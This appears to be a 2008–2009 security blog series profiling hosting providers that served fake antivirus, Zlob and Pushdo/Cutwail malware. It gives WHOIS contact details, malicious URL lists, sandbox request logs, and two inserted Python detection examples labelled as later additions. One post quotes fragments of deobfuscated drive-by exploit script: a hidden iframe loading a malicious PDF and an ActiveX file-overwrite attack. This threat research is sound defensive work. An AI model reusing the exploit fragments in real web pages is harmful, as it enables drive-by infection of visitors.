Posted by: realsecurity | April 16, 2009

Moving Hosts

I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a account as a trial and I’ve been very pleasantly surprised by the feedback and interest the blog has received. So to get more flexibility I’ve moved to a proper webhost. The blog will be in a bit of a state of flux as I transition to . Stay tuned.

Posted by: realsecurity | March 14, 2009

Social Security Awards

Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say, I would appreciate your votes in the Best Technical Security Blog area.

Vote here:

I shall resume regular updates in May upon my return!

Posted by: realsecurity | January 29, 2009

Mobile Device Forensics

While catching up on security news in an internet cafe in Buenos Aires, I came upon the news that the newly elected US president Barack Obama is going to be the first president to use a BlackBerry.


With there being some buzz around BlackBerry security, it’s a good time to mention the paper I wrote for SANS on mobile device forensics.

It can be found at:

The paper covers how to investigate a cellular phone (Motorola Razr), smartphone (BlackBerry) and MP3 player to gather information, recover deleted data, etc.

Posted by: realsecurity | January 7, 2009

Taking some time off

Since we normally only live once, I’ve decided to take an extended vacation. Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I’ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America.

Maybe I’ll post some photos along the way to make all my readers jealous 🙂

Happy hunting,


Posted by: realsecurity | December 22, 2008

Sources of Badness – Still Trade LTD

The absolute worst culprit that I’ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here.
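
The series judges a host by how many of the web servers observed in its block are serving malware (30 of 34 above). The Python below is an added example, not code from the original post, that does that bookkeeping: it groups a constructed set of (IP, verdict) observations by prefix, computes the bad-host ratio per block and ranks the blocks, ignoring blocks with too few servers seen to judge. The hosts use documentation address ranges and the verdict labels are assumptions for illustration; the prefix length can be widened (e.g. /22) to see whether a small block's badness is shared by its parent allocation.

```python
import ipaddress
from collections import defaultdict

# Constructed observations of web servers and the verdict reached for each,
# using documentation address ranges; none of these are the hosts in the post.
OBSERVATIONS = [
    ("198.51.100.10", "bad"), ("198.51.100.11", "bad"),
    ("198.51.100.12", "bad"), ("198.51.100.13", "clean"),
    ("203.0.113.5", "bad"), ("203.0.113.6", "clean"), ("203.0.113.7", "clean"),
    ("203.0.113.8", "clean"), ("203.0.113.9", "clean"),
    ("192.0.2.44", "bad"),  # a lone hit: too few servers seen to judge the block
]


def summarize_by_prefix(observations, prefix_len=24):
    """Group observed servers by their /prefix_len and return
    {network: (bad, total, bad_ratio)}."""
    counts = defaultdict(lambda: [0, 0])  # net -> [bad, total]
    for ip, verdict in observations:
        net = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
        counts[net][1] += 1
        if verdict == "bad":
            counts[net][0] += 1
    return {str(net): (bad, total, bad / total)
            for net, (bad, total) in counts.items()}


def rank_blocks(observations, min_servers=3, prefix_len=24):
    """Blocks with at least min_servers observed, worst ratio first
    (ties broken by network string so the order is stable)."""
    summary = summarize_by_prefix(observations, prefix_len)
    rows = [(net, bad, total, ratio)
            for net, (bad, total, ratio) in summary.items()
            if total >= min_servers]
    return sorted(rows, key=lambda r: (-r[3], r[0]))


def report(observations, min_servers=3, prefix_len=24):
    """Human-readable lines in the style of the post ('30 of 34 are bad')."""
    return [f"{net}: {bad} of {total} observed servers bad ({ratio:.0%})"
            for net, bad, total, ratio
            in rank_blocks(observations, min_servers, prefix_len)]


if __name__ == "__main__":
    for line in report(OBSERVATIONS):
        print(line)
```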

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: 20080624
source: RIPE

Still Trade hosts a ton of fake/rogue anti virus domains and applications. We’ve seen these hosts pop up recently:
2008-12-01 /setup/setup.exe – Fake AV
2008-12-11 /cd/650/1749/wmpcdcs.exe – Zlob
2008-12-03 /cd/650/1663/wmpcdcs.exe – Zlob
Same as above

The following IPs are associated with malicious applications:

BISS also has a comprehensive list of domains and malware being served by these guys.

Posted by: realsecurity | December 17, 2008

Sources of Badness – Starline Web Services

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C, as reported by FireEye.

inetnum: -
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed: 20080403
source:         RIPE

The Yahoo article has lots of great information on the relationship between Starline and its upstream providers, so I won’t delve into that here.

Here are the hits I’ve seen from their IP space:

2008-11-05 /load.php
2008-11-12 /cache/doc.pdf
2008-11-22 /cache/doc.pdf
2008-10-24 /zpl/pdf.php
2008-10-30 /eez3a893/spl/pdf.pdf
2008-11-26 /u8899r5v/spl/pdf.pdf
2008-12-17 /yg6cv7ar/spl/pdf.pdf
2008-09-18 /1/
2008-09-17 /1/

There’s quite a history here. From the looks of things, someone has been moving around their malware from domain to domain on All of these sites are down as of this writing except Let’s dive further into this site.

The first page I saw was /yg6cv7ar/spl/pdf.pdf; however, this is not the whole story. When investigating that exact URL, pdf.pdf is not found. This is curious as I saw the site earlier today. Backing up to the root of, we get an index page. The index page contains an iframe that points to a different directory. The malware author must have coded his site to rotate directory names based on certain criteria. This makes investigation difficult if you can’t figure out where it will send victims to next.

The next iframe I got contained:


The next page that comes into play is the exploit script index.php, which is detected as:


Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and the Microsoft Access Snapshot Viewer. Here’s some of the script:

var p_url = "";
function MDAC(){

var nuc='';
d8= 0;
var koSZV = document.createElement("o"+nuc+"b"+nuc+"je"+nuc+"c"+nuc+"t");
function PDF()
document.write('<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>');
function SS()
var arbitrary_file = p_url;
var dest = 'C:/AUTOEXEC.BAT';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
if (MDAC()||PDF()||SS()) { }

Detections for the malicious pdf:


The payload is a file called ztt.php; here are a few of the detections:


A quick submission to Threat Expert (report) and Anubis (report) reveals further binaries that are downloaded. The .dat files are not exes, but a type of binary data file.

From ANUBIS:1033 to – []
Request: GET /flo/zro.dat
Response: 200 “OK”
Request: GET /flo/mp.dat
Response: 200 “OK”
Request: GET /flo/3rkour.dat
Response: 200 “OK”

Of particular interest is, another Latvian host with a small /24 network. Might be worth keeping your eyes open for them too.

inetnum: -
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT
From ANUBIS:1036 to – []
Request: GET /myfiles/95/139/file.exe
Response: 200 “OK”
From ANUBIS:1037 to – []
Request: GET /files/20026.exe
Response: 200 “OK”

Some detections for 20026.exe and file.exe:



The FakeAlert signatures are correct; the threat ultimately installs some fake anti virus / anti spyware application.


Posted by: realsecurity | December 16, 2008

Sources of Badness – PortNAP

One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We’ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP –

inetnum: -
netname:        GFX-CUST-PORTNAP
descr:          PortNAP Internet Services
org:            ORG-PIS13-RIPE
country:        NL
admin-c:        GFX-RIPE
tech-c:         GFX-RIPE
status:         ASSIGNED PA
mnt-by:         GFX-MNT
changed: 20081021
source:         RIPE
abuse-mailbox:

2008-12-02 – site down /2009/download/trial/A9installer_880473.exe
2008-12-02 – site down /download/trial/AV360Install_77014205.exe
2008-11-20 – site down /2009/download/trial/A9installer_880290.exe

Posted by: realsecurity | December 15, 2008

Sources of Badness – ZlKon

After a weekend hiatus, I’m back with the next host of interest – ZlKon.

role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:          +371 26330593
admin-c:        AD5952-RIPE
tech-c:         AD5952-RIPE
nic-hdl:        ZK508-RIPE
mnt-by:         ZLKON-MNT
changed: 20081125
source:         RIPE

Based in Latvia, Zlkon seems to have a high ratio of bad IPs to its small address space. A customer of the larger DATORU EXPRESS SERVISS, Zlkon has two /24s –

% Information related to ''

descr:          "DATORU EXPRESS SERVISS" Ltd.
origin:         AS12553
mnt-by:         PCEXPRESS-MNT
changed: 20081121
source:         RIPE

2008-12-02 – not accessible /2009/download/trial/A9installer_880135.exe
2008-12-09 /download/Keygen.Image.for.DOS.2.08c3098.exe
2008-12-02 /download/windows311megaupload_3019.exe
Same as above
2008-12-12 /download/moonmovie.v.3.484.exe
Same as above
2008-11-27 – not accessible
antivirus– /installer_00004.exe
2008-12-02 – not accessible
2008-12-02 – not accessible
2008-12-12 /MCLiteodecVer.6.20467.exe
Same as below
2008-12-13 /MCLiteodecVer.6.20271.exe
2008-12-03 – not accessible /2009/download/trial/A9installer_880147.exe
2008-12-14 /exclusivemovie.1518.exe

So we’ve got some fake antivirus, Renos, Zlob, etc. Nothing overly terrible like a banking trojan or spam bot, but who knows what else is being hosted in Zlkon’s address space.

Posted by: realsecurity | December 12, 2008

Sources of Badness – UATelecom

The next source of badness I’ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run-in with this host, which you can read about here (written in German).

netname: BASTION-NET
descr: ISP UATelecom
country: EU
organisation: ORG-TG39-RIPE
org-name: UATELECOM LLC.
org-type: OTHER
address: Ukraine, Voznesensk, Lenina 52
remarks: ————————-
phone: +38-048-701-05-45
phone: +38-096-380-13-21
phone: +38-096-380-13-26
fax-no: +38-048-701-05-45
remarks: ————————-

We’ve seen lots of malware from their netblock:

2008-10-30 – site down /mix/xcvb.pdf
2008-12-09 – site down /2009/download/trial/InstallAVv_880460.exe
2008-12-02 /get/1xxx5912940/download.exe – Troj/Zlob-AOX
2008-12-02 /WinDefender2009.exe – fake AV – AntiVirus2008.AIJ
2008-12-03 (more on this below) /spl/load.php – SPAM Bot

load.php (an exe) is downloaded from the index of /spl/. The exploit code has 2/38 detections, JS:Packed-X.

2008-12-03 – site down /2009/download/trial/A9installertest_880135.exe
2008-11-27 – sites down /k-codec.335.exe
2008-12-02 /moviecodec.91.exe
2008-12-04 /moviecodec.136.exe

Since drops a SPAM bot I decided to dig a little deeper. When infected, the bot first calls home via a GET to

OrgName:    SoftLayer Technologies Inc.
OrgID:      SOFTL
Address:    1950 N Stemmons Freeway
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US

GET /40E8001430303030303030303030303030303030303031306C000001A366000000007600000642EB00053098A9B3BE HTTP/1.0

HTTP/1.0 200 OK
Date: Fri, 12 Dec 2008 16:10:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 12 Dec 2008 16:10:22 GMT
Cache-Control: no-cache
Content-Length: 110604
Connection: close
Content-Type: application/octet-stream

The stream contains some sort of obfuscated payload. It then makes a bunch of DNS requests to various SMTP servers and starts to send spam. There is also a side channel of some sort that it establishes to over port 2065.

OrgID:      HVC-3
Address:    400 N Tampa St
Address:    #1025
City:       Tampa
StateProv:  FL
PostalCode: 33602
Country:    US

This traffic also seems obfuscated with the only readable string below:


From doing a little digging, this threat really is Pushdo/Cutwail. It’s interesting that the exploit site is hosted in the Ukraine, but the C&Cs are located in the US.
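
The beacon above has two properties a proxy log can be checked for: a GET whose entire path is one long hex blob, answered with application/octet-stream, followed by the infected machine resolving mail servers for many different domains before it starts sending spam. The Python below is an added example, not code from the original post, that runs those two heuristic checks over constructed proxy and DNS log lines and correlates the clients that trip both. The beacon path is the one quoted above; the client addresses, the benign lines, the 40-character length floor and the threshold of five distinct MX lookups are assumptions chosen for the example.

```python
import re
from collections import defaultdict

# A request path that is nothing but a long run of hex digits.
# The 40-character floor is an assumption for this example.
HEX_PATH_RE = re.compile(r"^/[0-9A-Fa-f]{40,}$")

# Constructed proxy-log lines: client, method, path, status, content-type, bytes.
# The first path is the beacon request quoted in the post; the rest is filler.
HTTP_LOG = [
    "10.0.0.5 GET /40E8001430303030303030303030303030303030303031306C000001A366000000007600000642EB00053098A9B3BE 200 application/octet-stream 110604",
    "10.0.0.7 GET /index.html 200 text/html 2048",
    "10.0.0.5 GET /images/logo.png 200 image/png 5120",
    # long hex path but an HTML answer: not a beacon under this heuristic
    "10.0.0.9 GET /ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789 200 text/html 300",
]

# Constructed DNS-log lines: client, query type, name (reserved .test names).
DNS_LOG = [
    "10.0.0.5 MX mail-a.test",
    "10.0.0.5 MX mail-b.test",
    "10.0.0.5 MX mail-c.test",
    "10.0.0.5 MX mail-d.test",
    "10.0.0.5 MX mail-e.test",
    "10.0.0.5 MX mail-a.test",  # repeat: distinct names are what count
    "10.0.0.7 MX mail-a.test",
    "10.0.0.7 A www.example.test",
]


def parse_http(line):
    client, method, path, status, ctype, size = line.split()
    return {"client": client, "method": method, "path": path,
            "status": int(status), "ctype": ctype, "size": int(size)}


def is_hex_beacon(rec):
    """GET of a pure-hex path answered with an opaque binary body."""
    return (rec["method"] == "GET"
            and HEX_PATH_RE.match(rec["path"]) is not None
            and rec["ctype"] == "application/octet-stream")


def find_beacons(lines):
    """(client, path) for every request matching the beacon shape."""
    return [(r["client"], r["path"])
            for r in map(parse_http, lines) if is_hex_beacon(r)]


def mx_burst_clients(lines, threshold=5):
    """Clients that resolved MX records for at least `threshold` distinct names."""
    names = defaultdict(set)
    for line in lines:
        client, qtype, name = line.split()
        if qtype == "MX":
            names[client].add(name)
    return sorted(c for c, n in names.items() if len(n) >= threshold)


def correlate(http_lines, dns_lines, threshold=5):
    """Clients that both fetched a hex-blob payload and went looking for mail servers."""
    beaconing = {client for client, _ in find_beacons(http_lines)}
    return sorted(beaconing & set(mx_burst_clients(dns_lines, threshold)))


if __name__ == "__main__":
    for client in correlate(HTTP_LOG, DNS_LOG):
        print(f"likely spam-bot infection: {client}")
```

Either check on its own is noisy (update services fetch binaries, mail relays query MX records all day), which is why the example reports only clients that show both behaviours; the thresholds should be tuned against a baseline of normal traffic before alerting on them.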

FireEye article
SecureWorks article

Happy hunting!

Posted by: realsecurity | December 11, 2008

Sources of Badness – LeaseWeb

**Edit 2**

I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of notifying hosts is not effective. If more organizations would take the time to investigate the sites attacking them and provide detailed evidence, the whole community would prosper.

**Edit** Seems this post has already drummed up some interest from several parties.

Let me just start by saying that I am not advocating that any of the hosts discussed here be knocked off the internet. Some people are all for shutting down hosting providers that host a lot of malware, others are not. The aim of this series of posts is to inform the public that there are some other hosts out there worth taking a look at.

Is all of LeaseWeb’s /16 AS bad? Of course not. Do they have a bunch of nefarious customers purchasing service from them? It certainly looks that way; I’m sure policing such a large address space has its challenges.

The more people that know where the badness comes from, the better. If there is a case to take down a host, that case comes from the community.


Given the recent interest in web hosts such as McColo and the success that security researchers have achieved in taking them down, I decided to look for others. Over the next several days I will post details on some shady web hosts from various parts of the world. This is by no means a definitive list; it is just a start. Hopefully others in the community will go check their logs/IDS and find more information.

If I had more hosts, maybe I could call this series of articles “The week of shady web hosts” 🙂
Today’s host is AS16265 LeaseWeb AS Amsterdam, Netherlands.

netname:        LEASEWEB
descr:          LeaseWeb
descr:          P.O. Box 93054
descr:          1090BB AMSTERDAM
descr:          Netherlands
remarks:        Please send email to "" for complaints
remarks:        regarding portscans, DoS attacks and spam.
remarks:        INFRA-AW
country:        NL
admin-c:        LSW1-RIPE
tech-c:         LSW1-RIPE
status:         ASSIGNED PA
mnt-by:         OCOM-MNT
changed: 20071015
source:         RIPE

Information related to ''

descr:          LEASEWEB
origin:         AS16265
remarks:        LeaseWeb
mnt-by:         OCOM-MNT
changed: 20050311
changed: 20070610
source:         RIPE

We’ve got exploits and hostile payloads from several IPs in their ranges. I haven’t had a chance to get VirusTotal results, however.

IP              Date       Domain/IP            URL

2008-12-08 /xrun.tmp (exe payload)
2008-11-06 /data.pdf (exploit)
2008-12-01 /stat/index.htm (exploit)
2008-12-09 /downloadsetupws.php (exe payload)
2008-10-14 /n_fia/pdf.php (exploit)
2008-12-03 /74812/a.php (exe payload)

Xentronix network (LeaseWeb) –
2008-11-05 /css/pdf.php (exploit)
2008-09-19 /gtest2/pdf.php (exploit)
2008-10-15 /gtest2/pdf.php (exploit)
